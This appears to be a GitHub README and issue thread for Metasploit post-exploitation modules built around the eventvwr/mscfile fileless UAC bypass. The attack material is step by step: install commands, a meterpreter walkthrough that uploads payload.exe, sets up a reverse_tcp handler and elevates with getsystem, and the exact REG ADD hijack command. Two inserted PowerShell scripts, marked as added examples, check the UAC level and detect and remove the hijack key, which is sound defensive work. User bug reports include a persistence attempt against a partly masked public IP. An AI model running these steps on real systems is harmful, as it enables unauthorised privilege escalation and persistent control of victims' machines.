r00t-3xp10it / msf-auxiliarys
My collection of metasploit auxiliary post-modules
Module Author : pedr0 Ubuntu [r00t-3xp10it]
Vuln discover : @enigma0x3 | @mattifestation
Tested on : Windows 7 | Windows 8 | Windows 10
enigma_fileless_uac_bypass.rb: metasploit post-exploitation module
POC: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking
Most of the UAC bypass techniques require dropping a file to disk (for example, placing a
DLL on disk to perform a DLL hijack). The technique used in this module differs from the
other public methods and provides a useful new technique that does not rely on a privileged
file copy, code injection, or placing a traditional file on disk.
As a normal user you have write access to keys in HKCU. If an elevated process interacts
with keys you are able to manipulate, you can potentially interfere with actions a high
integrity process is attempting to perform (hijack the process being started). Because the
process can be hijacked, it is possible to simply execute whatever malicious cmd.exe or
powershell.exe command you wish ..
This means that code execution has been achieved in a high integrity process
(bypassing UAC) without dropping a DLL or other file to the file system. This
significantly reduces the risk to the attacker because they aren't placing a traditional
file on the file system that can be caught by AV/HIPS or forensically identified later ..
WARNING: This module will not work if the target UAC level is set to 'Always Notify' ..
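Because the module only works below 'Always Notify', the defensive check is to read the UAC policy values that define that level. The script below is an added example, not part of the r00t-3xp10it module or its README: it reports the current level from the standard policy key and, with -WhatIf support, can raise it to 'Always Notify'. The function names are mine; it assumes an elevated PowerShell session because the HKLM write needs admin.

```powershell
# Added example (not from the r00t-3xp10it module). Reads the UAC policy values
# that decide whether auto-elevating binaries such as eventvwr.exe can elevate
# without a prompt, and can raise the level to "Always notify".
# Assumes an elevated PowerShell session; values are the documented defaults.

$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacLevel {
    $p         = Get-ItemProperty -Path $UacKey
    $enableLua = [int]$p.EnableLUA
    $consent   = [int]$p.ConsentPromptBehaviorAdmin
    $secure    = [int]$p.PromptOnSecureDesktop

    # Map the value pairs to the names shown in the UAC settings dialog
    $level = if ($enableLua -ne 1)                      { 'UAC disabled' }
             elseif ($consent -eq 2 -and $secure -eq 1) { 'Always notify' }
             elseif ($consent -eq 5 -and $secure -eq 1) { 'Default (notify on app changes)' }
             elseif ($consent -eq 5 -and $secure -eq 0) { 'Notify without secure desktop' }
             elseif ($consent -eq 0)                    { 'Never notify' }
             else                                       { "Custom ($consent/$secure)" }

    [pscustomobject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $consent
        PromptOnSecureDesktop      = $secure
        Level                      = $level
        # Auto-elevation (and therefore this class of bypass) is only blocked at level 2
        AutoElevateBypassPossible  = ($enableLua -eq 1 -and $consent -ne 2)
    }
}

function Set-UacAlwaysNotify {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($UacKey, 'Set UAC to Always notify')) {
        Set-ItemProperty -Path $UacKey -Name EnableLUA                  -Value 1 -Type DWord
        Set-ItemProperty -Path $UacKey -Name ConsentPromptBehaviorAdmin -Value 2 -Type DWord
        Set-ItemProperty -Path $UacKey -Name PromptOnSecureDesktop      -Value 1 -Type DWord
        # A change to EnableLUA only takes effect after a reboot
    }
}

Get-UacLevel | Format-List
# Set-UacAlwaysNotify -WhatIf   # preview the change before applying it
```

Run it as-is to see the current level; drop the -WhatIf once you are happy with the preview. Raising the level is the only setting in this key that actually closes the auto-elevation path the module depends on; the secure desktop flag alone does not.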
1º - Download post-module from github using wget
wget https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/local%20privilege%20escalation/enigma_fileless_uac_bypass.rb
2º - Port post-module to metasploit database (KALI distros)
cp enigma_fileless_uac_bypass.rb /usr/share/metasploit-framework/modules/post/windows/escalate/enigma_fileless_uac_bypass.rb
3º - Start postgresql
service postgresql start
4º - Rebuild metasploit database
msfdb reinit
5º - Reload all modules into msf database
msfconsole -x 'db_status; reload_all'
6º - Load post-module
msf > use post/windows/escalate/enigma_fileless_uac_bypass
7º - read/access info/options
msf post(enigma_fileless_uac_bypass) > info
msf post(enigma_fileless_uac_bypass) > show advanced options
Privilege escalation: https://www.youtube.com/watch?v=Ph7MajHbEVQ
Simple command execution: https://www.youtube.com/watch?v=upmNEJRf5Z8
UAC bypass method credits:
@enigma0x3 @mattifestation @subTee
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking
Special Thanks:
@chaitanya (SSA Team Member)
Hi!
Got mistake (Wsearch.rb):
[!] [ABORT]: Operative System => Windows 7 (Build 7601, Service Pack 1).
[-] Only windows systems are supported by this module...
[-] Please execute [info] for further information...
[-] Post failed: Rex::Script::Completed Rex::Script::Completed
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/escalate/Wsearch.rb:158:in `unsupported'
[-] /usr/share/metasploit-framework/modules/post/windows/escalate/Wsearch.rb:420:in `run'
Post module execution completed
Tested on win7 x64.
What's wrong?
enigma_fileless_uac_bypass -- metasploit post-exploitation module:
enigma_fileless_IsolatedCommand -- metasploit post-exploitation module:
This next tutorial explains how EXEC_COMMAND can be used to achieve privilege escalation ..
We have managed to exploit a Windows target, but when trying to escalate privileges
using the Metasploit core modules (getprivs and getsystem) the execution fails and none
of the 3 methods available in the getsystem module works...
1 - get a meterpreter session open to the target system ..
"it's a post-exploitation module, so it requires a session already open"
2 - upload your payload.exe to target system
meterpreter > upload /root/payload.exe %temp%\\payload.exe
3 - background current session (ID 1)
meterpreter > background
4 - start a new handler in background (of the payload uploaded)
msf exploit(handler) > handler -P 666 -H 192.168.1.69 -p windows/meterpreter/reverse_tcp
5 - load enigma_fileless module
msf exploit(handler) > use post/windows/escalate/enigma_fileless ...
set SESSION 1
set EXEC_COMMAND start %temp%\\payload.exe
exploit
Hint: If we desire to use target powershell interpreter to execute payload:
set SESSION 1
set USE_POWERSHELL true
set EXEC_COMMAND start %temp%\\payload.exe
exploit
The second session will open as a high integrity process (elevated process hijack),
allowing us to escalate privileges using Metasploit post-modules like getprivs and getsystem
1 - Interact with the second session
msf exploit(handler) > sessions -i 2
2 - elevate privileges now
meterpreter > getprivs
meterpreter > getsystem
Full command being executed on the target machine (REG ADD):
cmd.exe /c REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ /d "C:\Windows\System32\cmd.exe /c start %temp%\\payload.exe" /f
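The REG ADD above is the whole footprint of the technique, so it is also what a defender looks for: the mscfile\shell\open\command key does not exist in a user hive on a clean system, so its presence alone is a strong indicator. The script below is an added example, not part of the r00t-3xp10it module or its README. It audits every loaded user hive for that key, can remove it (with -WhatIf support), and pulls matching Sysmon registry value-set events (Event ID 13) when Sysmon is installed with registry logging configured. The function names are mine; it assumes an elevated session so that all HKEY_USERS subkeys are readable.

```powershell
# Added example (not from the r00t-3xp10it module). Audits all loaded user hives
# for the mscfile\shell\open\command hijack key written by this bypass, removes it
# on request, and lists matching Sysmon Event ID 13 (registry value set) events.
# Assumes an elevated session; the Sysmon part assumes Sysmon logs registry events.

function Get-MscfileHijack {
    foreach ($hive in Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue) {
        $sid = $hive.PSChildName
        # HKCU\Software\Classes is a link to the HKU\<SID>_Classes hive, so the same
        # hijack can show up under both names; both are checked for completeness.
        $keyPath = if ($sid -like '*_Classes') {
            "Registry::HKEY_USERS\$sid\mscfile\shell\open\command"
        } else {
            "Registry::HKEY_USERS\$sid\Software\Classes\mscfile\shell\open\command"
        }
        if (Test-Path -LiteralPath $keyPath) {
            $cmd = (Get-ItemProperty -LiteralPath $keyPath -ErrorAction SilentlyContinue).'(default)'
            [pscustomobject]@{
                UserSid = $sid
                Key     = $keyPath
                Command = $cmd
            }
        }
    }
}

function Remove-MscfileHijack {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($f in Get-MscfileHijack) {
        # Remove the whole user-level mscfile class; nothing legitimate lives there
        $classKey = $f.Key -replace '\\shell\\open\\command$', ''
        if ($PSCmdlet.ShouldProcess($classKey, 'Remove hijacked mscfile class')) {
            Remove-Item -LiteralPath $classKey -Recurse -Force
        }
    }
}

function Get-MscfileRegistryEvents {
    param([int]$MaxEvents = 1000)
    # Sysmon Event ID 13 = RegistryEvent (Value Set)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13 }
    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Select fields by name from the event XML rather than by positional index
        $data   = ([xml]$e.ToXml()).Event.EventData.Data
        $target = ($data | Where-Object { $_.Name -eq 'TargetObject' }).'#text'
        if ($target -like '*\Classes\mscfile\shell\open\command*' -or
            $target -like '*_Classes\mscfile\shell\open\command*') {
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Image   = ($data | Where-Object { $_.Name -eq 'Image' }).'#text'
                Target  = $target
                Details = ($data | Where-Object { $_.Name -eq 'Details' }).'#text'
            }
        }
    }
}

Get-MscfileHijack         | Format-Table -AutoSize
Get-MscfileRegistryEvents | Format-Table -AutoSize
# Remove-MscfileHijack -WhatIf   # preview what would be deleted
```

The Sysmon query gives you the writing process (Image) and the command that was stored (Details), which is what ties a finding back to the session that planted it; the hive audit catches keys planted before logging was enabled.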
enigma_fileless_uac_bypass -- metasploit post-exploitation module:
This next tutorial is one example of how the 'USE_POWERSHELL' and 'EXEC_COMMAND'
options can work together, using the target's powershell.exe interpreter to
execute commands.
set SESSION 1
set USE_POWERSHELL true
set EXEC_COMMAND start chrome.exe www.youporn.com
exploit
Full command being executed on the target machine:
cmd.exe /c REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ /d "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -Command start chrome.exe www.youporn.com" /f
msf post(linux/manage/kali_initd_persistence) > exploit
[!] SESSION may not be compatible with this module.
+---------------------------------------------+
| Kali Linux init.d persistence post-module |
| Author : r00t-3xp10it |
+---------------------------------------------+
Running on session : 2
Target Architecture : x64
Computer : 51.------------
Target IP addr : 51.------------
Operative System : Ubuntu 16.04 (Linux 4.4.0-31-generic)
Payload directory : /root
Client UID : uid=0, gid=0, euid=0, egid=0
[*] Running module against: 51--------
[*] Remote agent full path found ..
[!] Writing systemd persistence startup script ..
[+] Service path: /etc/systemd/system/persistence.service
[-] systemd script: /etc/systemd/system/persistence.service not found ..
[-] Persistence on: 51.-------------- not achieved ..
What's the problem? There is /etc/systemd/system, my payload is on the session in meterpreter, and I also set it as a standalone ELF file and set the full path. Any idea? Ubuntu has the same architecture, but I can't understand what the problem is. I also checked the permissions, it's root! Thanks for developing a good script :)